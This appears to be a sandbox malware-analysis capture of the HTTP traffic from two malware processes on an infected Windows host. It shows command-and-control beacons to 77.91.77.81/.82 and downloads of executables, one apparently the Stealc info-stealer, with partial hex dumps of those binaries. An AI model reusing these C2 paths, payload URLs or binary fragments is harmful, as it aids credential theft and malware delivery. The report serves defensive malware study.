                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:06.675810099 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:06.678679943 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:06.900939941 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.64982177.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:07.028402090 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:07.720402002 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:07.721416950 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:07.937711000 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.64982277.91.77.8180504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:07.054306984 CEST49OUTGET /cost/num.exe HTTP/1.1
                                                                                        Host: 77.91.77.81
                                                                                        Jul 24, 2024 07:15:07.767776966 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:07 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 192000
                                                                                        Last-Modified: Mon, 22 Jul 2024 02:01:04 GMT
                                                                                        Connection: keep-alive
                                                                                        ETag: "669dbd60-2ee00"
                                                                                        Accept-Ranges: bytes
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 50 af 9d 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELPfB"d@0$@<#|$.textJ .rdata@@.data+!@.reloc*D#F@B
                                                                                        Jul 24, 2024 07:15:07.767827034 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 79 b9 41 00 70 c8 41 00 d9 c8 41 00 00 00 00
                                                                                        Data Ascii: yApAAUQEE}tMUUEEE]UEExMUMMM]UQSjh0hAj$bE
                                                                                        Jul 24, 2024 07:15:07.767838955 CEST1236INData Raw: 8b 8d 10 fc ff ff 51 83 ec 0c 8b cc 8d 95 04 fc ff ff 52 e8 bb 8c 01 00 81 ec 88 00 00 00 8b cc 8d 45 08 50 e8 ca 00 00 00 8d 8d a4 fb ff ff 51 e8 9e 37 01 00 81 c4 a0 00 00 00 8d 8d a4 fb ff ff e8 ed 8c 01 00 8d 8d f8 fb ff ff e8 b2 8f 01 00 50
                                                                                        Data Ascii: QREPQ7PbjjRAM]UQMM|nMHcM<XM0MM]
                                                                                        Jul 24, 2024 07:15:07.768013954 CEST672INData Raw: 35 8d 4d f4 e8 56 88 01 00 8d 4d e8 e8 4e 88 01 00 8d 4d 08 e8 46 88 01 00 8d 4d 18 e8 3e 88 01 00 8d 4d 24 e8 36 88 01 00 8d 4d 34 e8 ae fb ff ff e9 11 05 00 00 68 54 51 42 00 8d 8d cc fe ff ff 51 ff 15 98 d0 62 00 85 c0 74 16 68 fc 51 42 00 8d
                                                                                        Data Ascii: 5MVMNMFM>M$6M4hTQBQbthQBRbu}hB(}0E$PlQhSBxRPQhLSBREPQhRBREPQ)
                                                                                        Jul 24, 2024 07:15:07.768026114 CEST1236INData Raw: ff e8 b9 85 01 00 8d 8d 08 fd ff ff e8 ae 85 01 00 8d 8d 14 fd ff ff e8 a3 85 01 00 8d 8d 20 fd ff ff e8 98 85 01 00 83 7d 30 00 74 30 8d 85 cc fe ff ff 50 8d 8d f0 fc ff ff 51 8d 8d 80 fe ff ff e8 29 87 01 00 50 8d 8d 80 fe ff ff e8 0d 86 01 00
                                                                                        Data Ascii: }0t0PQ)Pb}0tMU$RPh<WBQSP0RPPhBtj
                                                                                        Jul 24, 2024 07:15:07.768035889 CEST1236INData Raw: d1 62 00 3b 45 0c 75 09 8b 4d 08 89 0d 90 d1 62 00 8b 55 08 8b 42 04 8b 4d 0c 03 41 04 8b 55 08 89 42 04 8b 45 08 8b 4d 0c 8b 51 08 89 50 08 8b 45 0c 83 78 08 00 74 0c 8b 4d 0c 8b 51 08 8b 45 08 89 42 0c 8b 45 08 5d c3 cc cc 55 8b ec 8b 45 08 83
                                                                                        Data Ascii: b;EuMbUBMAUBEMQPExtMQEBE]UE]UE]U=buh hB2EPEMQbR]E}uEPbQAE}u3TUjaEM
                                                                                        Jul 24, 2024 07:15:07.768254042 CEST1236INData Raw: 00 00 83 c4 0c a3 28 cb 62 00 6a 0c 68 9c 1e 42 00 68 ac 1e 42 00 e8 3c 20 00 00 83 c4 0c a3 ac cc 62 00 6a 09 68 bc 1e 42 00 68 c8 1e 42 00 e8 23 20 00 00 83 c4 0c a3 24 cc 62 00 6a 0d 68 d4 1e 42 00 68 e4 1e 42 00 e8 0a 20 00 00 83 c4 0c a3 cc
                                                                                        Data Ascii: (bjhBhB< bjhBhB# $bjhBhB bjhBhBbjhBh$B(bjh<BhDBbjhLBh\BPbjhlBhtB@bjh|BhBtbjhBh
                                                                                        Jul 24, 2024 07:15:07.768265963 CEST1236INData Raw: ca 62 00 6a 17 68 8c 23 42 00 68 a4 23 42 00 e8 6f 1b 00 00 83 c4 0c a3 1c cd 62 00 6a 0a 68 bc 23 42 00 68 c8 23 42 00 e8 56 1b 00 00 83 c4 0c a3 8c c9 62 00 6a 0d 68 d4 23 42 00 68 e4 23 42 00 e8 3d 1b 00 00 83 c4 0c a3 88 cc 62 00 6a 08 68 f4
                                                                                        Data Ascii: bjh#Bh#Bobjh#Bh#BVbjh#Bh#B=bjh#Bh$B$(bjh$Bh$BLbjh,$Bh8$BbjhD$BhP$BLbjh\$Bhl$Bhbjh|$Bh$B\bjh$Bh$B
                                                                                        Jul 24, 2024 07:15:07.768275023 CEST328INData Raw: 50 2a 42 00 e8 a6 16 00 00 83 c4 0c a3 18 cb 62 00 6a 10 68 64 2a 42 00 68 78 2a 42 00 e8 8d 16 00 00 83 c4 0c a3 b0 cd 62 00 6a 1b 68 8c 2a 42 00 68 a8 2a 42 00 e8 74 16 00 00 83 c4 0c a3 54 cc 62 00 6a 0d 68 c4 2a 42 00 68 d4 2a 42 00 e8 5b 16
                                                                                        Data Ascii: P*Bbjhd*Bhx*Bbjh*Bh*BtTbjh*Bh*B[@bjh*Bh*BBbjh+Bh+B)0bjh+Bh(+BHbjh4+Bh@+BbjhL+Bh`+B`bjht+Bh+Bbj
                                                                                        Jul 24, 2024 07:15:07.768466949 CEST1236INData Raw: 00 e8 61 15 00 00 83 c4 0c a3 18 ca 62 00 6a 0d 68 1c 2c 42 00 68 2c 2c 42 00 e8 48 15 00 00 83 c4 0c a3 7c cd 62 00 6a 0b 68 3c 2c 42 00 68 48 2c 42 00 e8 2f 15 00 00 83 c4 0c a3 c0 c9 62 00 6a 0d 68 54 2c 42 00 68 64 2c 42 00 e8 16 15 00 00 83
                                                                                        Data Ascii: abjh,Bh,,BH|bjh<,BhH,B/bjhT,Bhd,B@bjht,Bh,Bbjh,Bh,Bbjh,Bh,B\bjh,Bh-B8bjh-Bh(-BXbjh<-BhP-BDbjhd
                                                                                        Jul 24, 2024 07:15:07.772722960 CEST1236INData Raw: cb 62 00 6a 07 68 d4 32 42 00 68 dc 32 42 00 e8 7f 10 00 00 83 c4 0c a3 6c cb 62 00 6a 07 68 e4 32 42 00 68 ec 32 42 00 e8 66 10 00 00 83 c4 0c a3 28 cd 62 00 6a 07 68 f4 32 42 00 68 fc 32 42 00 e8 4d 10 00 00 83 c4 0c a3 70 ca 62 00 6a 04 68 04
                                                                                        Data Ascii: bjh2Bh2Blbjh2Bh2Bf(bjh2Bh2BMpbjh3Bh3B4bjth(3Bh3Bbjh4Bh 4Bbjh3Bh(4Bbjh3Bh04Bbj h<4Bh`4Bbjh4Bh4B


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.64982377.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:09.098198891 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:09.786689043 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:09.792741060 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:10.015672922 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.64982877.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:09.455697060 CEST179OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 31
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 64 31 3d 31 30 30 30 30 31 39 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                        Data Ascii: d1=1000019031&unit=246122658369
                                                                                        Jul 24, 2024 07:15:10.170115948 CEST193INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4 <c>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.64982977.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:10.125549078 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:10.863200903 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:10.863943100 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:11.097727060 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.64983077.91.77.8180504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:10.177027941 CEST54OUTGET /stealc/random.exe HTTP/1.1
                                                                                        Host: 77.91.77.81
                                                                                        Jul 24, 2024 07:15:10.900487900 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:10 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 214528
                                                                                        Last-Modified: Wed, 24 Jul 2024 05:06:32 GMT
                                                                                        Connection: keep-alive
                                                                                        ETag: "66a08bd8-34600"
                                                                                        Accept-Ranges: bytes
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9f 18 76 f1 db 79 18 a2 db 79 18 a2 db 79 18 a2 66 36 8e a2 da 79 18 a2 c5 2b 9c a2 c5 79 18 a2 c5 2b 8d a2 cb 79 18 a2 c5 2b 9b a2 b8 79 18 a2 fc bf 63 a2 dc 79 18 a2 db 79 19 a2 b3 79 18 a2 c5 2b 92 a2 da 79 18 a2 c5 2b 8c a2 da 79 18 a2 c5 2b 89 a2 da 79 18 a2 52 69 63 68 db 79 18 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 46 5b 9e 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 02 00 00 20 02 00 00 00 00 00 11 16 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 24 00 00 04 00 00 50 86 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$vyyyf6y+y+y+ycyyy+y+y+yRichyPELF[d0 @@0$P,X<@\.text|/0 `.rdata @"4@@.datah"pV@.tohit@@.diducowv@.rsrck z@@
                                                                                        Jul 24, 2024 07:15:10.900700092 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 1c 40 42 00 3b 0d 04 70 42 00 75 02 f3 c3 e9 06 06 00 00 8b ff 55 8b ec 83
                                                                                        Data Ascii: %@B;pBuU S39]uSSSSSGME;tVEEEPSuEPEEBCMxEEPSYY^[U S39]uBSSSSS
                                                                                        Jul 24, 2024 07:15:10.900712967 CEST1236INData Raw: 18 00 00 33 f6 89 75 fc 8d 45 98 50 ff 15 74 40 42 00 6a fe 5f 89 7d fc b8 4d 5a 00 00 66 39 05 00 00 40 00 75 38 a1 3c 00 40 00 81 b8 00 00 40 00 50 45 00 00 75 27 b9 0b 01 00 00 66 39 88 18 00 40 00 75 19 83 b8 74 00 40 00 0e 76 10 33 c9 39 b0
                                                                                        Data Ascii: 3uEPt@Bj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CSYujXY<ujGY8]'6}jO,Y6dC5B4}j*,Y2}j,YS,Y;tP,YN2]t
                                                                                        Jul 24, 2024 07:15:10.900859118 CEST1236INData Raw: f0 8b d9 74 32 83 7f 08 00 75 2c 8b 45 08 01 06 eb 2b 8a 03 ff 4d 08 8b cf e8 7d ff ff ff 43 83 3e ff 75 13 e8 4f 0d 00 00 83 38 2a 75 0f 8b cf b0 3f e8 64 ff ff ff 83 7d 08 00 7f d5 5e 5b 5d c3 8b ff 55 8b ec 81 ec 78 02 00 00 a1 04 70 42 00 33
                                                                                        Data Ascii: t2u,E+M}C>uO8*u?d}^[]UxpB3ES]Vu3W}ulu53PPPPPMt`pF@u^V0DYvB
                                                                                        Jul 24, 2024 07:15:10.900870085 CEST1236INData Raw: 00 8b 8d e8 fd ff ff 83 f9 ff 75 05 b9 ff ff ff 7f 83 c7 04 f7 85 f0 fd ff ff 10 08 00 00 89 bd dc fd ff ff 8b 7f fc 89 bd e4 fd ff ff 0f 84 b1 04 00 00 3b fe 75 0b a1 10 70 42 00 89 85 e4 fd ff ff 8b 85 e4 fd ff ff c7 85 c8 fd ff ff 01 00 00 00
                                                                                        Data Ascii: u;upBXHHty+'HHt0GPhPPLtG5;t;H;t4
                                                                                        Jul 24, 2024 07:15:10.900883913 CEST1236INData Raw: 40 40 3b ce 75 f4 2b 85 e4 fd ff ff d1 f8 eb 28 3b fe 75 0b a1 0c 70 42 00 89 85 e4 fd ff ff 8b 85 e4 fd ff ff eb 07 49 80 38 00 74 05 40 3b ce 75 f5 2b 85 e4 fd ff ff 89 85 e0 fd ff ff 83 bd c0 fd ff ff 00 0f 85 5c 01 00 00 8b 85 f0 fd ff ff a8
                                                                                        Data Ascii: @@;u+(;upBI8t@;u+\@t2t-t+t ++uSj pvYtuWSj0
                                                                                        Jul 24, 2024 07:15:10.900890112 CEST1236INData Raw: 8b 42 00 ff 15 70 40 42 00 8b d8 3b df 75 4c 39 3d 48 8a 42 00 74 33 56 e8 21 07 00 00 59 85 c0 0f 85 72 ff ff ff 8b 45 10 3b c7 0f 84 50 ff ff ff c7 00 0c 00 00 00 e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 c0 07 00 00 59 c3 3b df 75 0d 8b 45 10 3b
                                                                                        Data Ascii: Bp@B;uL9=HBt3V!YrE;PE3ujY;uE;t&UVWuM Eu3;t0;u,mWWWWW}tE`p39}t}|}$MS}~~EPjPrDM
                                                                                        Jul 24, 2024 07:15:10.901324034 CEST1236INData Raw: 59 89 07 85 c0 75 13 8d 46 14 6a 02 89 46 08 89 06 58 89 46 18 89 46 04 eb 0d 8b 3f 89 7e 08 89 3e 89 5e 18 89 5e 04 81 4e 0c 02 11 00 00 33 c0 5f 40 5b eb 02 33 c0 5e 5d c3 8b ff 55 8b ec 83 7d 08 00 74 27 56 8b 75 0c f7 46 0c 00 10 00 00 74 19
                                                                                        Data Ascii: YuFjFXFF?~>^^N3_@[3^]U}t'VuFtVAff&fY^]h-@d5D$l$l$+SVWpB1E3PeuEEEEdMdY__^[]QUS]Vs35pBWEE
                                                                                        Jul 24, 2024 07:15:10.901335955 CEST1236INData Raw: 89 4d fc f6 c1 01 0f 85 d3 02 00 00 53 8d 1c 31 8b 13 89 55 f4 8b 56 fc 89 55 f8 8b 55 f4 89 5d 0c f6 c2 01 75 74 c1 fa 04 4a 83 fa 3f 76 03 6a 3f 5a 8b 4b 04 3b 4b 08 75 42 bb 00 00 00 80 83 fa 20 73 19 8b ca d3 eb 8d 4c 02 04 f7 d3 21 5c b8 44
                                                                                        Data Ascii: MS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJM;v;t^Mq;qu;
                                                                                        Jul 24, 2024 07:15:10.901346922 CEST1236INData Raw: f0 49 3b f1 8d 7c 39 fc 8b 1f 89 4d 10 89 5d fc 0f 8e 55 01 00 00 f6 c3 01 0f 85 45 01 00 00 03 d9 3b f3 0f 8f 3b 01 00 00 8b 4d fc c1 f9 04 49 89 4d f8 83 f9 3f 76 06 6a 3f 59 89 4d f8 8b 5f 04 3b 5f 08 75 43 bb 00 00 00 80 83 f9 20 73 1a d3 eb
                                                                                        Data Ascii: I;|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML!uM!YO_YOyM+M}}MOL1?vj?_]][Y]YKYKY;YuWLM
                                                                                        Jul 24, 2024 07:15:10.906848907 CEST1236INData Raw: 04 3b 4a 08 75 5e 8a 4c 06 04 88 4d 0b fe c1 83 fe 20 88 4c 06 04 7d 23 80 7d 0b 00 75 0b bf 00 00 00 80 8b ce d3 ef 09 3b 8b ce bf 00 00 00 80 d3 ef 8b 4d fc 09 7c 88 44 eb 29 80 7d 0b 00 75 0d 8d 4e e0 bf 00 00 00 80 d3 ef 09 7b 04 8b 4d fc 8d
                                                                                        Data Ascii: ;Ju^LM L}#}u;M|D)}uN{MN7MtLMuNL2uy>u;BuM;LrCu%BMB_^[UWVuM};v;r=qCt


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.64983134.107.221.82807200C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:10.299712896 CEST305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                        Host: detectportal.firefox.com
